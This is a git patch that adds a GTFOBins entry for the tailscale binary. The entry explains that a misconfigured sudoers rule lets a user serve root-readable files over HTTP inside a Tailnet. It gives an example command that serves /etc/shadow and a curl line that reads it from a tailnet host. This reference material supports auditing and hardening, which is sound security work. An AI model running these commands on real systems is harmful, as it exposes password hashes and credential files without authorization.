From bfd71131697737345792367bb955e3129cbf6569 Mon Sep 17 00:00:00 2001
From: Nebtyy <123236820+Nebtyy@users.noreply.github.com>
Date: Sat, 11 Oct 2025 12:05:22 +0200
Subject: [PATCH] Create tailscale.md

Add `tailscale` binary for `sudo` file-read vector via the `serve` subcommand.

Allows reading root-owned files over HTTP inside the Tailnet if misconfigured in `sudoers`.

Discovered by https://github.com/Nebtyy
---
 _gtfobins/tailscale.md | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 _gtfobins/tailscale.md

diff --git a/_gtfobins/tailscale.md b/_gtfobins/tailscale.md
new file mode 100644
index 00000000..5c748088
--- /dev/null
+++ b/_gtfobins/tailscale.md
@@ -0,0 +1,26 @@
+---
+description: |
+  If the `tailscale` binary is allowed via `sudo`, it can be abused to read arbitrary root-readable files
+  using the `serve` subcommand. This launches an HTTP server (accessible within the same Tailnet)
+  that exposes the specified file without further access control.
+
+functions:
+  sudo:
+    - description: |
+        If the user can run `/usr/bin/tailscale` as root via `sudo`, they can serve and read any file
+        accessible by root. The file becomes reachable via a Tailscale-assigned domain over HTTP.
+
+        Example `sudoers` entry:
+        ```
+        ray ALL=(ALL) NOPASSWD: /usr/bin/tailscale
+        ```
+
+        Example exploitation:
+        ```
+        sudo tailscale serve --http=8888 /etc/shadow
+        curl http://<hostname>.<tailnet>.ts.net:8888/
+        ```
+      code: |
+        sudo tailscale serve --http=8888 /etc/shadow
+        curl http://<hostname>.<tailnet>.ts.net:8888/
+---